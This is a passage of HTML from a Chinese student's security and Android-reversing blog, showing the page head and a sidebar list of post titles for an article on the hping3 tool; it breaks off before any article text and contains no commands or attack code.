<!DOCTYPE html>
<html>
<head>
  <meta name="referrer" content="no-referrer" />
  <meta charset="utf-8">
  <title>hping3命令详解（转） | iHui</title>
  <meta name="keywords" content=" 网络安全 , 拒绝服务攻击 ">
  <meta name="description" content="hping3命令详解（转） | iHui">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="个人简介iHui 目前是一名北京工业大学信息学部网络空间安全专业的硕士研究生。  熟悉Java、Python、和HTML等编程语言； 熟悉TCP&#x2F;IP协议，具有协议分析经验； 了解网站开发和渗透测试流程以及渗透测试工具的使用； 了解Android软件开发和逆向分析的流程以及常见逆向分析工具的使用。  喜欢研究Android系统领域的新兴技术和未来发展方向。 最近在跟着导师一边学习可信计算">
<meta property="og:type" content="website">
<meta property="og:title" content="关于">
<meta property="og:url" content="https://xingshuaikun.gitee.io/about/index.html">
<meta property="og:site_name" content="iHui">
<meta property="og:description" content="个人简介iHui 目前是一名北京工业大学信息学部网络空间安全专业的硕士研究生。  熟悉Java、Python、和HTML等编程语言； 熟悉TCP&#x2F;IP协议，具有协议分析经验； 了解网站开发和渗透测试流程以及渗透测试工具的使用； 了解Android软件开发和逆向分析的流程以及常见逆向分析工具的使用。  喜欢研究Android系统领域的新兴技术和未来发展方向。 最近在跟着导师一边学习可信计算">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2021-06-25T09:43:28.000Z">
<meta property="article:modified_time" content="2023-02-22T03:39:53.441Z">
<meta property="article:author" content="iHui">
<meta name="twitter:card" content="summary">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 6.1.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/avatar.jpg"/>
</a>
<div class="author">
    <span>iHui</span>
</div>

<div class="icon">
    
        
    
        
            <a title="github"
               href="https://github.com/xingshuaikun"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-github"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
            <a title="email"
               href="mailto:xingshuaikun@163.com"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-email"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="qq"
               href="http://wpa.qq.com/msgrd?v=3&uin=898245375&site=qq&menu=yes"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-qq"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
</div>




<ul>
    <li>
        <div class="all active" data-rel="全部文章">全部文章
            
                <small>(119)</small>
            
        </div>
    </li>
    
        
            
                <li>
                    <div data-rel="计算机考研复试">
                        
                        计算机考研复试
                        <small>(8)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="计算机网络">
                        
                        计算机网络
                        <small>(2)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="经验">
                        
                        经验
                        <small>(8)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="密码学">
                        
                        密码学
                        <small>(9)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="数据结构">
                        
                        数据结构
                        <small>(5)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="算法">
                        
                        算法
                        <small>(7)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="网络安全">
                        
                        网络安全
                        <small>(10)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="Android">
                        
                        Android
                        <small>(27)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="Cpp">
                        
                        Cpp
                        <small>(6)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="CSharp">
                        
                        CSharp
                        <small>(1)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="CTF">
                        
                        CTF
                        <small>(11)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="DVWA">
                        
                        DVWA
                        <small>(4)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="Java">
                        
                        Java
                        <small>(1)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="JavaScript">
                        
                        JavaScript
                        <small>(6)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="Linux">
                        
                        Linux
                        <small>(1)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="MySQL">
                        
                        MySQL
                        <small>(2)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="python">
                        
                        python
                        <small>(4)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="Web">
                        
                        Web
                        <small>(6)</small>
                        
                    </div>
                    
                </li>
            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
            
    </div>
    <div>
        
            <a class="about  hasFriend  site_url"
               
               href="/about">关于</a>
        
        <a style="width: 50%"
                
                                           class="friends">友链</a>
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="119">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://yelog.org/">叶落阁</a></li>
            
            <li><a target="_blank" href="https://skysec.top/">一叶飘零</a></li>
            
            <li><a target="_blank" href="https://comydream.github.io/">追随梦想</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">全部文章</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" />
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>计算机考研复试</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>计算机网络</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>教材答案</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>经验</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>拒绝服务攻击</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>库与模块</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>密码学</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>牛客网</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>前端</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>数据结构</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>算法</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>网络安全</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>协议</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>信息安全数学</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Android</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>APP Inventor</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>C</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>C++</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>CSharp</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>CTF</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>DVWA</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Java</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>JavaScript</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Linux</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Misc</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>MySQL</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>python</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Reverse</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>web</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Web</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>writeup</a>
            </li>
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        <a id="top" class="全部文章 "
           href="/2019/10/11/%E5%8D%9A%E5%AE%A2%E5%A3%B0%E6%98%8E/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="博客声明">博客声明</span>
            <span class="post-date" title="2019-10-11 16:49:47">2019/10/11</span>
        </a>
        
        <a  class="全部文章 网络安全 "
           href="/2023/05/23/OWASP%20TOP10/"
           data-tag="网络安全"
           data-author="" >
            <span class="post-title" title="OWASP TOP10">OWASP TOP10</span>
            <span class="post-date" title="2023-05-23 21:09:49">2023/05/23</span>
        </a>
        
        <a  class="全部文章 网络安全 "
           href="/2023/05/23/%E5%B8%B8%E8%A7%81%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%BC%8F%E6%B4%9E/"
           data-tag="网络安全"
           data-author="" >
            <span class="post-title" title="常见中间件漏洞">常见中间件漏洞</span>
            <span class="post-date" title="2023-05-23 20:20:49">2023/05/23</span>
        </a>
        
        <a  class="全部文章 网络安全 "
           href="/2023/05/23/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E3%80%81HTTP%E8%AF%B7%E6%B1%82%E8%BF%87%E7%A8%8B%E3%80%81session%E5%92%8Ccookie%E3%80%81%E5%AF%86%E7%A0%81%E5%AD%A6%E3%80%81%E5%BA%94%E6%80%A5%E6%BA%AF%E6%BA%90%E3%80%81HTTP%E4%B8%8EHTTPS/"
           data-tag="密码学,网络安全"
           data-author="" >
            <span class="post-title" title="渗透测试、HTTP请求过程、session和cookie、密码学、应急溯源、HTTP与HTTPS、Kerberos">渗透测试、HTTP请求过程、session和cookie、密码学、应急溯源、HTTP与HTTPS、Kerberos</span>
            <span class="post-date" title="2023-05-23 19:35:49">2023/05/23</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2023/03/11/%E6%9C%80%E5%8F%B3so%E5%B1%82OLLVM%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%B7%B7%E6%B7%86%E8%BF%98%E5%8E%9F/"
           data-tag="Android,Reverse"
           data-author="" >
            <span class="post-title" title="最右so层OLLVM字符串混淆还原">最右so层OLLVM字符串混淆还原</span>
            <span class="post-date" title="2023-03-11 19:05:49">2023/03/11</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2023/03/02/ELF%E6%96%87%E4%BB%B6%E7%BB%93%E6%9E%84/"
           data-tag="Android,Reverse"
           data-author="" >
            <span class="post-title" title="ELF文件结构">ELF文件结构</span>
            <span class="post-date" title="2023-03-02 10:43:20">2023/03/02</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2023/02/28/DEX%E6%96%87%E4%BB%B6%E7%BB%93%E6%9E%84/"
           data-tag="Android,Reverse"
           data-author="" >
            <span class="post-title" title="DEX文件结构">DEX文件结构</span>
            <span class="post-date" title="2023-02-28 18:01:43">2023/02/28</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2023/02/20/%E4%BA%BA%E4%BA%BA%E8%A7%86%E9%A2%91APP%E7%99%BB%E5%BD%95%E5%8D%8F%E8%AE%AE%E5%88%86%E6%9E%90/"
           data-tag="Android,Reverse"
           data-author="" >
            <span class="post-title" title="人人视频APP登录协议分析">人人视频APP登录协议分析</span>
            <span class="post-date" title="2023-02-20 21:19:07">2023/02/20</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2023/02/16/%E5%8F%8D%E8%B0%83%E8%AF%95%E5%AE%9E%E6%88%98%E6%A1%88%E4%BE%8B%E5%88%86%E6%9E%90/"
           data-tag="Android,Reverse"
           data-author="" >
            <span class="post-title" title="反调试实战案例分析">反调试实战案例分析</span>
            <span class="post-date" title="2023-02-16 16:05:03">2023/02/16</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2023/02/11/%E6%A8%A1%E6%8B%9F%E5%99%A8%E5%92%8C%E5%8F%8D%E8%B0%83%E8%AF%95%E6%A3%80%E6%B5%8B/"
           data-tag="Android,Reverse"
           data-author="" >
            <span class="post-title" title="模拟器和反调试检测">模拟器和反调试检测</span>
            <span class="post-date" title="2023-02-11 14:33:10">2023/02/11</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2022/12/29/%E5%B8%B8%E8%A7%81APK%E4%BF%9D%E6%8A%A4%E7%AD%96%E7%95%A5/"
           data-tag="Android,Reverse"
           data-author="" >
            <span class="post-title" title="常见APK保护策略">常见APK保护策略</span>
            <span class="post-date" title="2022-12-29 21:03:40">2022/12/29</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2022/12/06/JEB%E3%80%81Android%20Studio%E3%80%81IDA%20Pro%E7%AE%80%E5%8D%95%E5%8A%A8%E6%80%81%E8%B0%83%E8%AF%95%E5%88%86%E6%9E%90/"
           data-tag="Android,Reverse"
           data-author="" >
            <span class="post-title" title="JEB、Android Studio、IDA Pro简单动态调试分析">JEB、Android Studio、IDA Pro简单动态调试分析</span>
            <span class="post-date" title="2022-12-06 20:53:41">2022/12/06</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2022/11/16/%E6%8F%92%E6%A1%A9%E3%80%81%E6%A0%88%E8%B7%9F%E8%B8%AA%E3%80%81%E6%96%B9%E6%B3%95%E5%89%96%E6%9E%90%E7%AE%80%E4%BB%8B/"
           data-tag="Android,Reverse"
           data-author="" >
            <span class="post-title" title="插桩、栈跟踪、方法剖析简介">插桩、栈跟踪、方法剖析简介</span>
            <span class="post-date" title="2022-11-16 21:03:40">2022/11/16</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2022/11/15/NDK%E5%BC%80%E5%8F%91%E6%80%BB%E7%BB%93/"
           data-tag="Android,Reverse"
           data-author="" >
            <span class="post-title" title="NDK开发总结">NDK开发总结</span>
            <span class="post-date" title="2022-11-15 10:44:43">2022/11/15</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2022/11/02/%E5%B8%B8%E8%A7%81APK%E7%A0%B4%E8%A7%A3%E6%80%9D%E8%B7%AF/"
           data-tag="Android,Reverse"
           data-author="" >
            <span class="post-title" title="常见APK破解思路">常见APK破解思路</span>
            <span class="post-date" title="2022-11-02 15:54:43">2022/11/02</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2022/10/21/Android--%E5%9B%9B%E5%A4%A7%E7%BB%84%E4%BB%B6%E4%B9%8BContentProvider/"
           data-tag="Android"
           data-author="" >
            <span class="post-title" title="Android--四大组件之ContentProvider">Android--四大组件之ContentProvider</span>
            <span class="post-date" title="2022-10-21 20:11:16">2022/10/21</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2022/10/16/Android--%E5%9B%9B%E5%A4%A7%E7%BB%84%E4%BB%B6%E4%B9%8BBroadcastReceiver/"
           data-tag="Android"
           data-author="" >
            <span class="post-title" title="Android--四大组件之BroadcastReceiver">Android--四大组件之BroadcastReceiver</span>
            <span class="post-date" title="2022-10-16 11:08:43">2022/10/16</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2022/10/12/Android--%E5%9B%9B%E5%A4%A7%E7%BB%84%E4%BB%B6%E4%B9%8BService/"
           data-tag="Android"
           data-author="" >
            <span class="post-title" title="Android--四大组件之Service">Android--四大组件之Service</span>
            <span class="post-date" title="2022-10-12 16:18:16">2022/10/12</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2022/10/11/Android--%E5%9B%9B%E5%A4%A7%E7%BB%84%E4%BB%B6%E4%B9%8BActivity/"
           data-tag="Android"
           data-author="" >
            <span class="post-title" title="Android--四大组件之Activity">Android--四大组件之Activity</span>
            <span class="post-date" title="2022-10-11 16:18:16">2022/10/11</span>
        </a>
        
        <a  class="全部文章 CTF "
           href="/2022/09/29/ByteCTF2022-wp/"
           data-tag="CTF,writeup"
           data-author="" >
            <span class="post-title" title="ByteCTF2022-wp">ByteCTF2022-wp</span>
            <span class="post-date" title="2022-09-29 15:53:00">2022/09/29</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2022/09/26/Android%20Killer%E7%AF%A1%E6%94%B9%E4%BF%A1%E6%81%AF%E3%80%81%E4%BF%AE%E6%94%B9%E5%8C%85%E5%90%8D%E5%92%8C%E5%8E%BB%E9%99%A4%E5%B9%BF%E5%91%8A/"
           data-tag="Android,Reverse"
           data-author="" >
            <span class="post-title" title="Android Killer篡改信息、修改包名和去除广告">Android Killer篡改信息、修改包名和去除广告</span>
            <span class="post-date" title="2022-09-26 19:34:21">2022/09/26</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2022/09/18/%E6%B3%A8%E5%85%A5%E6%A1%86%E6%9E%B6Frida%E7%9A%84%E5%AE%89%E8%A3%85%E9%85%8D%E7%BD%AE%E4%B8%8E%E5%9F%BA%E6%9C%AC%E4%BD%BF%E7%94%A8/"
           data-tag="Android,Reverse"
           data-author="" >
            <span class="post-title" title="注入框架Frida的安装配置与基本使用">注入框架Frida的安装配置与基本使用</span>
            <span class="post-date" title="2022-09-18 09:17:04">2022/09/18</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2022/09/17/Hook%E7%9A%84%E7%B1%BB%E5%9E%8B/"
           data-tag="Android,Reverse"
           data-author="" >
            <span class="post-title" title="Hook的类型">Hook的类型</span>
            <span class="post-date" title="2022-09-17 16:02:43">2022/09/17</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2022/09/14/%E4%BD%BF%E7%94%A8IDA%20Pro%E8%B0%83%E8%AF%95Android%E5%8E%9F%E7%94%9F%E7%A8%8B%E5%BA%8F/"
           data-tag="Android,Reverse"
           data-author="" >
            <span class="post-title" title="使用IDA Pro调试Android原生程序">使用IDA Pro调试Android原生程序</span>
            <span class="post-date" title="2022-09-14 19:47:31">2022/09/14</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2022/04/19/%E5%8A%A8%E6%80%81%E5%88%86%E6%9E%90Android%E7%A8%8B%E5%BA%8F/"
           data-tag="Android,Reverse"
           data-author="" >
            <span class="post-title" title="动态分析Android程序">动态分析Android程序</span>
            <span class="post-date" title="2022-04-19 11:12:43">2022/04/19</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2022/04/14/%E5%B8%B8%E8%A7%81Android%E6%96%87%E4%BB%B6%E6%A0%BC%E5%BC%8F/"
           data-tag="Android,Reverse"
           data-author="" >
            <span class="post-title" title="常见Android文件格式">常见Android文件格式</span>
            <span class="post-date" title="2022-04-14 18:43:13">2022/04/14</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2022/04/11/Dalvik%E5%8F%AF%E6%89%A7%E8%A1%8C%E6%A0%BC%E5%BC%8F%E4%B8%8E%E5%AD%97%E8%8A%82%E7%A0%81%E8%A7%84%E8%8C%83/"
           data-tag="Android,Reverse"
           data-author="" >
            <span class="post-title" title="Dalvik可执行格式与字节码规范">Dalvik可执行格式与字节码规范</span>
            <span class="post-date" title="2022-04-11 15:50:42">2022/04/11</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2021/09/21/IDA%20Pro%E9%9D%99%E6%80%81%E5%88%86%E6%9E%90dex%E6%96%87%E4%BB%B6/"
           data-tag="Android,Reverse"
           data-author="" >
            <span class="post-title" title="IDA Pro静态分析dex文件">IDA Pro静态分析dex文件</span>
            <span class="post-date" title="2021-09-21 10:03:42">2021/09/21</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2021/09/13/%E7%BC%96%E5%86%99%E5%B9%B6%E5%88%86%E6%9E%90%E7%AC%AC%E4%B8%80%E4%B8%AAAndroid%E5%BA%94%E7%94%A8%E7%A8%8B%E5%BA%8F/"
           data-tag="Android,Reverse"
           data-author="" >
            <span class="post-title" title="编写并分析第一个Android应用程序">编写并分析第一个Android应用程序</span>
            <span class="post-date" title="2021-09-13 19:37:43">2021/09/13</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2021/09/05/Android%E5%9B%9B%E5%A4%A7%E7%BB%84%E4%BB%B6/"
           data-tag="Android,经验"
           data-author="" >
            <span class="post-title" title="Android四大组件">Android四大组件</span>
            <span class="post-date" title="2021-09-05 21:20:16">2021/09/05</span>
        </a>
        
        <a  class="全部文章 经验 "
           href="/2021/06/25/%E4%B8%AD%E5%9B%BD%E7%9F%BF%E4%B8%9A%E5%A4%A7%E5%AD%A6%E6%9C%AC%E7%A7%91%E7%94%9F%E6%B6%AF%E6%80%BB%E7%BB%93/"
           data-tag="经验"
           data-author="" >
            <span class="post-title" title="中国矿业大学本科生涯总结">中国矿业大学本科生涯总结</span>
            <span class="post-date" title="2021-06-25 17:50:40">2021/06/25</span>
        </a>
        
        <a  class="全部文章 计算机考研复试 "
           href="/2021/03/19/%E5%8C%97%E4%BA%AC%E5%B7%A5%E4%B8%9A%E5%A4%A7%E5%AD%A6%E8%80%83%E7%A0%94--%E5%A4%8D%E8%AF%95--%E6%9C%BA%E8%AF%95%E5%88%B7%E9%A2%98/"
           data-tag="C,计算机考研复试"
           data-author="" >
            <span class="post-title" title="北京工业大学考研--复试--机试刷题">北京工业大学考研--复试--机试刷题</span>
            <span class="post-date" title="2021-03-19 18:47:38">2021/03/19</span>
        </a>
        
        <a  class="全部文章 计算机考研复试 "
           href="/2021/01/07/%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%80%83%E7%A0%94%E5%A4%8D%E8%AF%95--%E7%89%9B%E5%AE%A2%E7%BD%91--C%E8%AF%AD%E8%A8%80%E7%BB%83%E4%B9%A0--Day7/"
           data-tag="C,计算机考研复试,牛客网"
           data-author="" >
            <span class="post-title" title="计算机考研复试--牛客网--C语言练习--Day7">计算机考研复试--牛客网--C语言练习--Day7</span>
            <span class="post-date" title="2021-01-07 21:16:49">2021/01/07</span>
        </a>
        
        <a  class="全部文章 计算机考研复试 "
           href="/2021/01/06/%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%80%83%E7%A0%94%E5%A4%8D%E8%AF%95--%E7%89%9B%E5%AE%A2%E7%BD%91--C%E8%AF%AD%E8%A8%80%E7%BB%83%E4%B9%A0--Day6/"
           data-tag="C,计算机考研复试,牛客网"
           data-author="" >
            <span class="post-title" title="计算机考研复试--牛客网--C语言练习--Day6">计算机考研复试--牛客网--C语言练习--Day6</span>
            <span class="post-date" title="2021-01-06 16:57:42">2021/01/06</span>
        </a>
        
        <a  class="全部文章 计算机考研复试 "
           href="/2021/01/05/%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%80%83%E7%A0%94%E5%A4%8D%E8%AF%95--%E7%89%9B%E5%AE%A2%E7%BD%91--C%E8%AF%AD%E8%A8%80%E7%BB%83%E4%B9%A0--Day5/"
           data-tag="C,计算机考研复试,牛客网"
           data-author="" >
            <span class="post-title" title="计算机考研复试--牛客网--C语言练习--Day5">计算机考研复试--牛客网--C语言练习--Day5</span>
            <span class="post-date" title="2021-01-05 19:43:46">2021/01/05</span>
        </a>
        
        <a  class="全部文章 计算机考研复试 "
           href="/2021/01/04/%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%80%83%E7%A0%94%E5%A4%8D%E8%AF%95--%E7%89%9B%E5%AE%A2%E7%BD%91--C%E8%AF%AD%E8%A8%80%E7%BB%83%E4%B9%A0--Day4/"
           data-tag="C,计算机考研复试,牛客网"
           data-author="" >
            <span class="post-title" title="计算机考研复试--牛客网--C语言练习--Day4">计算机考研复试--牛客网--C语言练习--Day4</span>
            <span class="post-date" title="2021-01-04 18:09:05">2021/01/04</span>
        </a>
        
        <a  class="全部文章 计算机考研复试 "
           href="/2021/01/03/%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%80%83%E7%A0%94%E5%A4%8D%E8%AF%95--%E7%89%9B%E5%AE%A2%E7%BD%91--C%E8%AF%AD%E8%A8%80%E7%BB%83%E4%B9%A0--Day3/"
           data-tag="C,计算机考研复试,牛客网"
           data-author="" >
            <span class="post-title" title="计算机考研复试--牛客网--C语言练习--Day3">计算机考研复试--牛客网--C语言练习--Day3</span>
            <span class="post-date" title="2021-01-03 18:25:13">2021/01/03</span>
        </a>
        
        <a  class="全部文章 计算机考研复试 "
           href="/2021/01/02/%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%80%83%E7%A0%94%E5%A4%8D%E8%AF%95--%E7%89%9B%E5%AE%A2%E7%BD%91--C%E8%AF%AD%E8%A8%80%E7%BB%83%E4%B9%A0--Day2/"
           data-tag="C,计算机考研复试,牛客网"
           data-author="" >
            <span class="post-title" title="计算机考研复试--牛客网--C语言练习--Day2">计算机考研复试--牛客网--C语言练习--Day2</span>
            <span class="post-date" title="2021-01-02 21:13:49">2021/01/02</span>
        </a>
        
        <a  class="全部文章 计算机考研复试 "
           href="/2021/01/01/%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%80%83%E7%A0%94%E5%A4%8D%E8%AF%95--%E7%89%9B%E5%AE%A2%E7%BD%91--C%E8%AF%AD%E8%A8%80%E7%BB%83%E4%B9%A0--Day1/"
           data-tag="C,计算机考研复试,牛客网"
           data-author="" >
            <span class="post-title" title="计算机考研复试--牛客网--C语言练习--Day1">计算机考研复试--牛客网--C语言练习--Day1</span>
            <span class="post-date" title="2021-01-01 09:43:16">2021/01/01</span>
        </a>
        
        <a  class="全部文章 经验 "
           href="/2020/12/30/Github%20Pages%E6%97%A0%E6%B3%95%E8%AE%BF%E9%97%AE%E7%9A%84%E8%A7%A3%E5%86%B3%E6%96%B9%E6%B3%95/"
           data-tag="经验"
           data-author="" >
            <span class="post-title" title="Github Pages无法访问的解决方法">Github Pages无法访问的解决方法</span>
            <span class="post-date" title="2020-12-30 20:07:16">2020/12/30</span>
        </a>
        
        <a  class="全部文章 密码学 "
           href="/2020/05/25/%E7%89%A9%E8%81%94%E7%BD%91%E5%BA%94%E7%94%A8%E5%B1%82CoAP%E9%80%9A%E4%BF%A1%E5%AE%89%E5%85%A8%E5%AE%9E%E7%8E%B0/"
           data-tag="协议,C"
           data-author="" >
            <span class="post-title" title="物联网应用层CoAP通信安全实现">物联网应用层CoAP通信安全实现</span>
            <span class="post-date" title="2020-05-25 19:11:43">2020/05/25</span>
        </a>
        
        <a  class="全部文章 python "
           href="/2020/04/24/python%E7%BC%96%E5%86%99%E8%AE%A1%E7%AE%97%E5%99%A8/"
           data-tag="python"
           data-author="" >
            <span class="post-title" title="python编写计算器">python编写计算器</span>
            <span class="post-date" title="2020-04-24 16:17:42">2020/04/24</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2020/04/10/%E5%9F%BA%E4%BA%8EAPP%20Inventor%E7%9A%84GPS%E4%BD%8D%E7%BD%AE%E5%BA%94%E7%94%A8%E5%BC%80%E5%8F%91/"
           data-tag="Android,APP Inventor"
           data-author="" >
            <span class="post-title" title="基于APP Inventor的GPS位置应用开发">基于APP Inventor的GPS位置应用开发</span>
            <span class="post-date" title="2020-04-10 21:15:43">2020/04/10</span>
        </a>
        
        <a  class="全部文章 Android "
           href="/2020/04/10/%E5%9F%BA%E4%BA%8EAPP%20Inventor%E7%9A%84%E8%93%9D%E7%89%99%E6%96%87%E6%9C%AC%E9%80%9A%E4%BF%A1%E5%BA%94%E7%94%A8%E5%BC%80%E5%8F%91/"
